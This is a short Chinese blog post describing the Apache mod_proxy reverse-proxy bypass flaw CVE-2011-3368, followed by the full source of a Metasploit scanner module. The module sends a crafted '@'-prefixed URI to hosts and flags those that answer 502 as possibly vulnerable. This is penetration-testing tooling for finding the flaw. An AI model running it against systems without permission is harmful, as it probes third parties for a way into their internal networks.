Reverse Proxy Bypass Scanner

发布:wpulog | 发布时间: 2011年10月11日

apache的mod_proxy模块存在安全漏洞,远程攻击者可以借助特殊请求绕过反向代码访问内网。漏洞编号：CVE-2011-3368

require 'msf/core'

class Metasploit3 &lt; Msf::Auxiliary
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::Scanner

 def initialize
  super(
   'Name'        =&gt; 'Reverse Proxy Bypass Scanner',
   'Version'     =&gt; '$Revision: $',
   'Description' =&gt; %q{
    Scan for poorly configured reverse proxy servers.
    By default, this module attempts to send a specially 
    crafted URI that will cause a proxy failure (status code 502)
    if the server is using rewrite rules susceptible to being bypassed
   },
   'Author'      =&gt; 'chao-mu',
   'License'     =&gt; BSD_LICENSE,
   'References'  =&gt;
    [
     ['URL', 'http://www.contextis.com/research/blog/reverseproxybypass/'],
     ['CVE', 'CVE-2011-3368'],
    ],
  )

  register_options(
   [
    OptString.new('ESCAPE_SEQUENCE', 
     [true, 'Character(s) that terminate the rewrite rule', '@']),

    OptString.new('INJECTED_URL',
     [true, 'String injected after escape sequence', '...']),

    OptInt.new('EXPECTED_RESPONSE',
     [true, 'Status code that indicates vulnerability', 502]),

    Opt::RPORT(80),
   ], self.class)
 end

 def run_host(host)
  uri = datastore['ESCAPE_SEQUENCE'] + datastore['INJECTED_URL']

  begin
   start_time = Time.now.utc
   response   = send_request_raw({'uri' =&gt; uri}, 60)
   end_time   = Time.now.utc

   seconds_transpired = (end_time - start_time).to_f

   if response.nil?
    vprint_error "Request against #{host} timed out"
    return
   end

   status_code = response.code
   if status_code == datastore['EXPECTED_RESPONSE']
    print_good "#{host} might be vulnerable!"
    report_vuln(
     :host   =&gt; host,
     :port   =&gt; rport,
     :proto  =&gt; 'tcp',
     :name   =&gt; self.fullname,
     :info   =&gt; "Returned #{status_code} when requested #{uri}",
     :refs   =&gt; self.references,
     :exploited_at =&gt; end_time
    )
   else
    print_status "#{host} responded with code #{status_code}."
    report_service(
     :host   =&gt; host,
     :port   =&gt; rport,
     :proto  =&gt; 'tcp',
     :name   =&gt; datastore['ssl'] ? 'https' : 'http',
    )
   end
   
   vprint_status "Request against #{host} took #{seconds_transpired} seconds"
  rescue ::Rex::ConnectionError =&gt; e
   vprint_error "#{host} - #{e.to_s}"
  end
 end
end